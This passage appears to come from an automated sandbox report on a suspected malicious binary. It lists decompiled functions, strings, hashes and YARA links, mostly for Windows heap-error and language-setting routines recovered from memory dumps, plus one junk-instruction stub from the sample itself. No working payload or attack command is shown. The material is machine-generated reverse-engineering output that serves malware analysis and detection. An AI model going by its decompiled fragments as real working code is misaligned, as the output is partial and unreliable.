The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 030CB3D6
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 030CB323
*** An Access Violation occurred in %ws:%s, xrefs: 030CB48F
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 030CB314
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 030CB484
*** then kb to get the faulting stack, xrefs: 030CB51C
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 030CB2DC
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 030CB305
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 030CB39B
The resource is owned exclusively by thread %p, xrefs: 030CB374

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: ef16de94765a17c92ccd3aadc5087b58c8fa94496b30da3e846915c88186cde3
Instruction ID: c14321583228edf9bcd7c4425d65cf9fdc595b6dd46dccff53e0240c51febea9
Opcode Fuzzy Hash: ef16de94765a17c92ccd3aadc5087b58c8fa94496b30da3e846915c88186cde3
Instruction Fuzzy Hash: 25811539A13650FFEB21EB89EC46EFF7B66AF86652F444048F0042F153E3A18441D6B2

Uniqueness

Uniqueness Score: -1.00%

Function 030D1C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E030D1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x2ff48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0301B150();
				} else {
					E0301B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x310589c);
				E0301B150("Heap error detected at %p (heap handle %p)\n",  *0x31058a0);
				_t27 =  *0x3105898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M030D1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0301B150();
				} else {
					E0301B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0301B150("Error code: %d - %s\n",  *0x3105898);
				_t113 =  *0x31058a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0301B150();
					} else {
						E0301B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0301B150("Parameter1: %p\n",  *0x31058a4);
				}
				_t115 =  *0x31058a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0301B150();
					} else {
						E0301B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0301B150("Parameter2: %p\n",  *0x31058a8);
				}
				_t117 =  *0x31058ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0301B150();
					} else {
						E0301B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0301B150("Parameter3: %p\n",  *0x31058ac);
				}
				_t119 =  *0x31058b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0301B150();
					} else {
						E0301B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x31058b4);
					E0301B150("Last known valid blocks: before - %p, after - %p\n",  *0x31058b0);
				} else {
					_t120 =  *0x31058b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0301B150();
				} else {
					E0301B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0301B150("Stack trace available at %p\n", 0x31058c0);
			}

0x030d1c10
0x030d1c16
0x030d1c1e
0x030d1c3d
0x030d1c3e
0x030d1c20
0x030d1c35
0x030d1c3a
0x030d1c44
0x030d1c55
0x030d1c5a
0x030d1c65
0x030d1c67
0x00000000
0x030d1c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x030d1c67
0x030d1cdc
0x030d1ce5
0x030d1d04
0x030d1d05
0x030d1ce7
0x030d1cfc
0x030d1d01
0x030d1d0b
0x030d1d17
0x030d1d1f
0x030d1d25
0x030d1d30
0x030d1d4f
0x030d1d50
0x030d1d32
0x030d1d47
0x030d1d4c
0x030d1d61
0x030d1d67
0x030d1d68
0x030d1d6e
0x030d1d79
0x030d1d98
0x030d1d99
0x030d1d7b
0x030d1d90
0x030d1d95
0x030d1daa
0x030d1db0
0x030d1db1
0x030d1db7
0x030d1dc2
0x030d1de1
0x030d1de2
0x030d1dc4
0x030d1dd9
0x030d1dde
0x030d1df3
0x030d1df9
0x030d1dfa
0x030d1e00
0x030d1e0a
0x030d1e13
0x030d1e32
0x030d1e33
0x030d1e15
0x030d1e2a
0x030d1e2f
0x030d1e39
0x030d1e4a
0x030d1e02
0x030d1e02
0x030d1e08
0x00000000
0x00000000
0x030d1e08
0x030d1e5b
0x030d1e7a
0x030d1e7b
0x030d1e5d
0x030d1e72
0x030d1e77
0x030d1e95

Strings

heap_failure_virtual_block_corruption, xrefs: 030D1C91
heap_failure_buffer_overrun, xrefs: 030D1C98
heap_failure_buffer_underrun, xrefs: 030D1C9F
heap_failure_cross_heap_operation, xrefs: 030D1CC2
heap_failure_multiple_entries_corruption, xrefs: 030D1C8A
heap_failure_lfh_bitmap_mismatch, xrefs: 030D1CD7
Parameter1: %p, xrefs: 030D1D5C
heap_failure_unknown, xrefs: 030D1C75
HEAP: , xrefs: 030D1C16, 030D1C3D, 030D1D04, 030D1D4F, 030D1D98, 030D1DE1, 030D1E32, 030D1E7A
heap_failure_freelists_corruption, xrefs: 030D1CC9
heap_failure_usage_after_free, xrefs: 030D1CBB
heap_failure_invalid_argument, xrefs: 030D1CAD
heap_failure_generic, xrefs: 030D1C7C
HEAP[%wZ]: , xrefs: 030D1C30, 030D1CF7, 030D1D42, 030D1D8B, 030D1DD4, 030D1E25, 030D1E6D
heap_failure_listentry_corruption, xrefs: 030D1CD0
heap_failure_entry_corruption, xrefs: 030D1C83
Last known valid blocks: before - %p, after - %p, xrefs: 030D1E45
Parameter3: %p, xrefs: 030D1DEE
Error code: %d - %s, xrefs: 030D1D12
heap_failure_block_not_busy, xrefs: 030D1CA6
Stack trace available at %p, xrefs: 030D1E86
heap_failure_internal, xrefs: 030D1C6E
heap_failure_invalid_allocation_type, xrefs: 030D1CB4
Heap error detected at %p (heap handle %p), xrefs: 030D1C50
Parameter2: %p, xrefs: 030D1DA5

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: adfe22d996de394d1a761e3486ad4b44a83fedef2d64ba623339ff57d98d4c4f
Instruction ID: 25d8f0df841fb7a38b9632179268824547175ab653dbee98d9907318c6d75e32
Opcode Fuzzy Hash: adfe22d996de394d1a761e3486ad4b44a83fedef2d64ba623339ff57d98d4c4f
Instruction Fuzzy Hash: 3B61F836517744DFE2D9E789E485E2873E5EB4D920B0A883AF90A6F351CF709890CF19

Uniqueness

Uniqueness Score: -1.00%

Function 03023D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E03023D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E03021B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E03021B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E03021B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E03021B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E03021B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L03034620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0305F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E03061370(_t276, 0x2ff4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0305BB40(0,  &_v68, _t170);
									if(L030243C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0305BB40(_t257,  &_v68, _t243);
								if(L030243C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E03061370(_t278, 0x2ff4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L03034620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0305F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E03061370(_v16, 0x2ff4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0305BB40(_t262,  &_v68, _t244);
								if(L030243C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E03061370(_t282, 0x2ff4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0305BB40(_t262,  &_v68, _t201);
							if(L030243C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L03034620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0305F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E03061370(_t280, 0x2ff4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0305BB40(_t267,  &_v68, _t245);
							if(L030243C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E03061370(_t284, 0x2ff4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0305BB40(_t267,  &_v68, _t224);
						if(L030243C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x03023d3c
0x03023d42
0x03023d44
0x03023d46
0x03023d49
0x03023d4c
0x03023d4f
0x03023d52
0x03023d55
0x03023d58
0x03023d5b
0x03023d5f
0x03023d61
0x03023d66
0x03078213
0x03078218
0x03024085
0x03024088
0x0302408e
0x03024094
0x0302409a
0x030240a0
0x030240a6
0x030240a9
0x030240af
0x030240b6
0x030240bd
0x030240bd
0x03023d83
0x0307821f
0x03078229
0x03078238
0x03078238
0x0307823d
0x0307823d
0x03023da0
0x03023daf
0x03023db5
0x03023dba
0x03023dba
0x03023dd4
0x03023e94
0x03023eab
0x03023f6d
0x03023f84
0x0302406b
0x0302406b
0x0302406e
0x0302406e
0x03024070
0x03024074
0x03078351
0x03078351
0x0302407a
0x0302407f
0x0307835d
0x03078370
0x03078377
0x03078379
0x0307837c
0x0307837c
0x0307835d
0x00000000
0x0302407f
0x03023f8a
0x03023f8d
0x03023f90
0x03023f95
0x0307830d
0x0307830f
0x03023f9b
0x03023fac
0x03023fae
0x03023fb1
0x03023fb1
0x03023fb6
0x03078317
0x0307831a
0x00000000
0x03023fbc
0x03023fc1
0x03023fc9
0x03023fd7
0x03023fda
0x03023fdd
0x03024021
0x03024021
0x03024029
0x03024030
0x03024044
0x03024046
0x03024046
0x03024044
0x03024049
0x03078327
0x03078334
0x03078339
0x0307833c
0x0302404f
0x0302404f
0x0302404f
0x03024051
0x03024056
0x03024063
0x03024063
0x03024068
0x00000000
0x03024068
0x03023fdf
0x03023fe2
0x03023fe4
0x03023fe7
0x03023fef
0x03024003
0x03024005
0x03024005
0x0302400c
0x03024013
0x03024016
0x03024017
0x0302401b
0x0302401e
0x00000000
0x0302401e
0x03023fb6
0x03023eb1
0x03023eb4
0x03023eb7
0x03023ebc
0x030782a9
0x030782ab
0x03023ec2
0x03023ed3
0x03023ed5
0x03023ed8
0x03023ed8
0x03023edd
0x030782b3
0x030782b6
0x00000000
0x03023ee3
0x03023ee8
0x03023eed
0x03023ef0
0x03023ef3
0x03023f02
0x03023f05
0x03023f08
0x030782c0
0x030782c3
0x030782c5
0x030782c8
0x030782d0
0x030782e4
0x030782e6
0x030782e6
0x030782ed
0x030782f4
0x030782f7
0x030782f8
0x030782fc
0x030782ff
0x030782ff
0x03023f0e
0x03023f11
0x03023f16
0x03023f1d
0x03023f31
0x03078307
0x03078307
0x03023f31
0x03023f39
0x03023f48
0x03023f4d
0x03023f50
0x03023f50
0x03023f53
0x03023f58
0x03023f65
0x03023f65
0x03023f6a
0x00000000
0x03023f6a
0x03023edd
0x03023dda
0x03023ddd
0x03023de0
0x03023de5
0x03078245
0x03023deb
0x03023df7
0x03023dfc
0x03023dfe
0x03023e01
0x03023e01
0x03023e06
0x0307824d
0x0307824f
0x03078254
0x00000000
0x03023e0c
0x03023e11
0x03023e16
0x03023e19
0x03023e29
0x03023e2c
0x03023e2f
0x0307825c
0x0307825f
0x03078261
0x03078264
0x0307826c
0x03078280
0x03078282
0x03078282
0x03078289
0x03078290
0x03078293
0x03078294
0x03078298
0x0307829b
0x0307829b
0x03023e35
0x03023e38
0x03023e3d
0x03023e44
0x03023e58
0x030782a3
0x030782a3
0x03023e58
0x03023e60
0x03023e6f
0x03023e74
0x03023e77
0x03023e77
0x03023e7a
0x03023e7f
0x03023e8c
0x03023e8c
0x03023e91
0x00000000
0x03023e91

Strings

Kernel-MUI-Language-SKU, xrefs: 03023F70
Kernel-MUI-Language-Allowed, xrefs: 03023DC0
Kernel-MUI-Number-Allowed, xrefs: 03023D8C
WindowsExcludedProcs, xrefs: 03023D6F
Kernel-MUI-Language-Disallowed, xrefs: 03023E97

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 79ef934993fb06b92d00d5c7dbb811dc12f9cb6d315545d8221b45d488cc2888
Instruction ID: 2ac174a4ce0afe806d47797efdcc4add65b98b88982eed1f8bb0aeb0b71c3629
Opcode Fuzzy Hash: 79ef934993fb06b92d00d5c7dbb811dc12f9cb6d315545d8221b45d488cc2888
Instruction Fuzzy Hash: 20F16D76D02228EBCB11DF99C980AEFBBFDFF48640F14405AE905AB250E7749E01CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00406899, Relevance: 6.4, Strings: 5, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00406899(void* __eax, void* __ecx) {

				asm("loopne 0x3");
				asm("loop 0x2c");
				return 1;
			}

0x004068a0
0x004068a2
0x004068b4

Strings

d, xrefs: 00406962
b, xrefs: 00406954
i, xrefs: 0040694D
a, xrefs: 0040695B
C, xrefs: 00406946

Memory Dump Source

Source File: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: C$a$b$d$i
API String ID: 0-2334916691
Opcode ID: 61be7322be254020c1ab43b820e074a1a286bead244e7e1e90923e57ab45715d
Instruction ID: a034c7138ee29f655394cb7a345e395fa8180af1c4f418133b570e17471abeb1
Opcode Fuzzy Hash: 61be7322be254020c1ab43b820e074a1a286bead244e7e1e90923e57ab45715d
Instruction Fuzzy Hash: 3141F7B5901308AEDB10DFA1DC81FFE77B8EF46704F00805EF555AB241D6786905CB69

Uniqueness

Uniqueness Score: -1.00%

Function 030140E1, Relevance: 6.3, Strings: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E030140E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0301B150();
					} else {
						E0301B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0301B150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E0301B150(", passed to %s", _t29);
					}
					_push("\n");
					E0301B150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x3106378 = 1;
						asm("int3");
						 *0x3106378 = 0;
					}
					return 0;
				}
				return 1;
			}

0x030140e6
0x030140e8
0x030140f1
0x0307042d
0x0307044c
0x03070451
0x0307042f
0x03070444
0x03070449
0x0307045d
0x03070466
0x0307046e
0x03070474
0x03070475
0x0307047a
0x0307048a
0x0307048c
0x03070493
0x03070494
0x03070494
0x00000000
0x0307049b
0x00000000

Strings

Invalid heap signature for heap at %p, xrefs: 03070458
, passed to %s, xrefs: 03070469
HEAP[%wZ]: , xrefs: 0307043F
HEAP: , xrefs: 0307044C
RtlAllocateHeap, xrefs: 03070468

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
API String ID: 0-188067316
Opcode ID: d367cc89ddb49f320c3a063d0bf450841eed552d56ad1dac50de50f3729df536
Instruction ID: 3135747ac8cdde5ddaf5710305e5c5f389ef357258dcc47bfffbae6c0d2b9d2c
Opcode Fuzzy Hash: d367cc89ddb49f320c3a063d0bf450841eed552d56ad1dac50de50f3729df536
Instruction Fuzzy Hash: C5012836502340AEF2B9D768A40DF96B7E8DF85B70F194069F20A8BA518FA49490C264

Uniqueness

Uniqueness Score: -1.00%

Function 0303A229, Relevance: 5.2, Strings: 4, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E0303A229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E0303DF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E03059730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E030DA80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E03059660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E0301B150();
					} else {
						E0301B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E0301B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E03037D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E030D138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E03037D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E03037D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
